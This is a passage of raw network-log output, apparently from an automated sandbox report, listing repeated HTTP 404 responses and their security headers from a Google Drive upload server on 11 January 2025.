1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ0fDEVSCdESLiu7qFHiMo3Df33jDibUjM32xY8Wnnnrg-1UXbcv04fhgOn-5P3T2XLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:17 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6l1rmoCeEBb8h9XUjAIHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ90Klv6Snc7PsAzuRft5W7ZiuF6Ro8kg3evHbdBu0izI0qZK_hT0aapgI6HDAW7u4ISEXVnNEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:19 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-69DEQxRekV8Eo3r2bUpjQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTc4uaSEo6QrpOmhQaovRKT5zDTB1rCcoJgk9fDy9eix_F9c93ignVFYTmB9YuzdfN3qeB23GgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-oMJ3axvNQWE2b_gheugbgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2VlrdF3xxGmaoJEXdrFEG-jAqB5m1o-GUEI_agm4ifUP2I_638LVMe9LB5W6pvx40luMwxakContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:24 GMTContent-Security-Policy: script-src 'nonce-VKpycSgaapTKQWwjzxq95g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSa8xXcBMP2cImUQNK7_X4ldih_6pHcgu-V9km2ltnFqcFcyEG5F8nKPHEP88vGSc48GZN5K10Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-1oS_KEGaPphbIX4rFVe1eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS8cQ0kWj-oudw8qbCzmOa1EJoW5KumnoCikkFPmbhR4Ngi5_c197TvS68Lkayg37REULMgrz8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:28 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dL7VXpJCvqk05agcTG3-1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4TyP7HKEo-aCqmH3kOXv3wrnFzhS4i8YRWj_6yP3Lx7Uo1DR4e0FEwEJgboFEX9tXGHNBsWP8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:31 GMTContent-Security-Policy: script-src 'nonce-sWdDrQwxsaTT7Q_tfPZJfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS9CFESnjFqNbJTq93mgzw1oweHUgqV_UZiCzYk0-WceTGduNQilj0TENk2uPkiiOmcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:33 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-TIJcnxkyUD8SrrSBW_gj6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTTwdrj4cojNJT66L7JCNUh80ZW52EM_MWoYryauThTi8MRuELgBVX-1jsqRX72EwJcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:35 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9jZPsYEbYliB7v0dK8_RZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTZ40gr02KsgfA8SWVVO6zVTGeSgfCYrUOFE1VSulmqf_n1e59064tx_95GPoGYyDuYEfsJn4wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NGd7-PDhCBccOVxFbeGJhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSWL9vuJ7KdwhvrJ9VugPA6MlE8_1W0SNe_skQ_pfqJQ8ZZIUd10sKRtOTiVRRnBzhBLcTi7DoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:40 GMTContent-Security-Policy: script-src 'nonce-hgAgtASwTeNjyWlD3ZnS_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTEkSdB5hS4vuXRSGDRJp6RYrJleGbFrd5lK99c7WGfKZTbdFgO68-6_CfJB2kJDCJt-ArzxFAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-pwvqD6LTrtBEmzgHA5vyHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC52WCurO64HWgCmKwyuTh-Z-o9GNpP7qlMDc0l9XI52ty04waw7yMExhVGTuCwClHAVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:44 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nSZ_3Pr0GrSS6exQnu7_RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTw8pVFJ_8gROVWcfMpRK9XMxYI1LnJgW4ao20t_wr7dGvE1bfAqkOQZvJa6BXOYrjaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-uSayR9OTTZLc2K0fZyucTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT-s8RMq3mIctGA5_O297JTFPDTUVkRH8CipXL9ci6-o5iiV_2WfornzL9WHl1GcH4M8bqaVPIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:49 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-A-lH-WkmLEHKA6lAxZAVEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, 